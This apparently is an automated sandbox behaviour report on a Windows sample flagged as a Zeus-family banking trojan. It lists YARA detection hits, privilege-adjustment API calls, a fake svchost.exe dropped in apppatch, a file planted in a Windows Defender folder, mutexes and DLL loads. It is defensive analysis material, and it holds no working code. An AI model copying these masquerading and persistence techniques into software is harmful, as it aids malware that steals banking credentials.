    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7304, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7280, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7256, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7232, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7212, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7188, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 344, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 3964, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 1080, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 3872, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: arxtPs1STE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: svchost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winEXE@10/53@2130/24
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_00401E00
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,2_2_00401E00
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD5930 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,2_2_02BD5930
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008F5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_008F5930
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008A5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,6_2_008A5930
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BF5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,9_2_02BF5930
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00401CF0 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,0_2_00401CF0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00402680 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,0_2_00402680
    Source: C:\Windows\apppatch\svchost.exeFile created: C:\Program Files (x86)\Windows Defender\vojyqem.comJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\login[1].htmJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMutant created: NULL
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7376
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7212
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7352
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess344
    Source: C:\Windows\apppatch\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\9E938F4Aa
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7304
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3964
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7328
    Source: C:\Users\user\Desktop\arxtPs1STE.exeFile created: C:\Users\user\AppData\Local\Temp\A834.tmpJump to behavior
    Source: arxtPs1STE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\arxtPs1STE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: arxtPs1STE.exeReversingLabs: Detection: 84%
    Source: arxtPs1STE.exeString found in binary or memory: -help
    Source: svchost.exeString found in binary or memory: -help
    Source: C:\Users\user\Desktop\arxtPs1STE.exeFile read: C:\Users\user\Desktop\arxtPs1STE.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\arxtPs1STE.exe "C:\Users\user\Desktop\arxtPs1STE.exe"
    Source: C:\Users\user\Desktop\arxtPs1STE.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7376 -s 776
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 748
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 756
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 740
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7212 -s 740
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 732
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3964 -s 756
    Source: C:\Users\user\Desktop\arxtPs1STE.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"Jump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: opengl32.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: glu32.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: vmhgfs.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: mpclient.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: opengl32.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: glu32.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: vmhgfs.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: mpclient.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: winscard.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: sensapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: symsrv.dllJump to behavior
    Source: C:\Windows\apppatch\svchost.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dllJump to behavior
